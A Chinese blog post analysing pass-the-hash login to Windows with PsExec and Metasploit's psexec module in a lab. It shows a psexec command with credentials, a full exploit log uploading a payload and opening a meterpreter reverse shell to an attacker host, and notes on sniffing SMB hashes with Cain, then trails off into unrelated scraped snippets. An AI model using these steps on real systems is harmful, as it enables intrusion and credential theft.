使用Hash直接登入Windows 簡單分析

2021-12-30 04:48:50 字數 2633 閱讀 4492

由於msf用到exploit/windows/smb/p***ec模組,所以猜想和pstool裡面的p***ec.exe應該有些許聯絡

檢視說明,p***ec.exe可以進行遠端連線得到乙個互動式cmdshell,

c:\documents and settings\administrator\桌p***ec.exe \\192.168.1.108 -u "admi

nistrator" -p "123" cmd

p***ec v1.98 - execute processes remotely

copyright (c) 2001-2010 mark russinovich

sysinternals - www.sysinternals.com

microsoft windows [版本 5.2.3790]

(c) 版權所有 1985-2003 microsoft corp.

c:\windows\system32>

csdn上某牛對於該工具的分析:pstools系列工具分析----對p***ec的逆向解析

「可以看到p***ec在通訊時主要用到了smb這個應用層協議。簡而言之,smb(伺服器資訊塊)協議是乙個通過網路在共享檔案、裝置、命名管道和郵槽之間運算元據的協議,我們建立ipc連線、對映網路驅動、拷貝檔案等操作都是基於smb協議」

話說回來,msf中使用的,自己重現使用hash登陸的部分過程:

msf exploit(p***ec) > exploit

[*] started reverse handler on 192.168.1.5:4444

[*] connecting to the server...

[*] authenticating to 192.168.1.108:445|workgroup as user 'administrator'...

[*] uploading payload...

[*] created \jlqnzixu.exe...

[*] binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.108[\svcctl] ...

[*] bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.108[\svcctl] ...

[*] obtaining a service manager handle...

[*] creating a new service (lvnaxyva - "myqqinw")...

[*] closing service handle...

[*] opening service...

[*] starting the service...

[*] removing the service...

[*] closing service handle...

[*] deleting \jlqnzixu.exe...

[*] sending stage (752128 bytes) to 192.168.1.108

[*] meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.108:1033) at 2013-01-05 22:05:35 +0800

meterpreter > sysinfo

computer :test

os : windows .net server (build 3790).

architecture : x86

system language : zh_cn

meterpreter : x86/win32

meterpreter >

可以看出認證部分[*] authenticating to 192.168.1.108:445|workgroup as user 'administrator'...應該就是向伺服器發起乙個使用者或共享的認證(其他的是meterpreter shell建立的過程),大致原理和p***ec.exe的是一樣的。

最後關鍵的問題是,msf這種的"使用的是hash登陸"。而smb協商過程指出:

「在smb協議中,如果你想進行一次在伺服器上的請求認證,你的密碼可以以原碼或加密後的形式傳送到伺服器端。如果伺服器支援加密屬性,客戶端必須傳送乙個應答訊號。在negprot應答資料報中,伺服器會給客戶端傳送乙個金鑰。然後,客戶端將密碼加密並通過sesssetupx請求資料報傳送到伺服器端。伺服器將會核查密碼的有效性,並由此允許或拒絕客戶端的訪問。你必須知道乙個smb密碼(未加密)的最大長度是14位。金鑰的長度一般為8位,加密過後的口令長度為24位。在ansi密碼中,密碼中的所有位都轉換成大寫的形式然後再加密。

密碼是以dec編碼方式進行加密的。」

抓包證明:

利用p***ec遠端連線,smb協商過程資料報:

另外:次過程中,通過cain做嗅探,導致smb協商不成功,而且cain抓出提出smb協議的主機的賬號及hash,而沒能抓出登陸過程使用的使用者名稱密碼

meterpreter連線方式(應答報文包含了乙個「securitymode」域,它判斷是否允許使用加密屬性):

得以驗證。

SourceTree 跳過註冊登入直接使用

windows 1.開啟資源管理器,將下面的 複製到位址列,開啟sourcetree的資料夾 2.在該資料夾下建立乙個json檔案,檔名為accounts.json,複製下面的 到 json 檔案中 baseurl credentials isdefault false mac 命令終端輸入defa...

直接掛載VMDK虛擬磁碟到你的Windows系統

vmware使用vmdk格式的虛擬磁碟。但你可能不知道通過vmware disk mount工具可以很容易的載入虛擬磁碟 vmdk 檔案到windows資源管理器。在告訴你如何使用vmware disk mount工具前,請先注意以下幾點 你可以通過vmware disk mount工具更改你的虛擬...

關於使用環信web im實現登入(直接登入)

我用的是v1.4.11版本,當時還沒有出12嘛,所以12也沒研究,不過應該變動不大。3,在web im下建立乙個html檔案。4,引入標籤 5,寫乙個ajax來實現登入 function cache false,datatype json success function data var encr...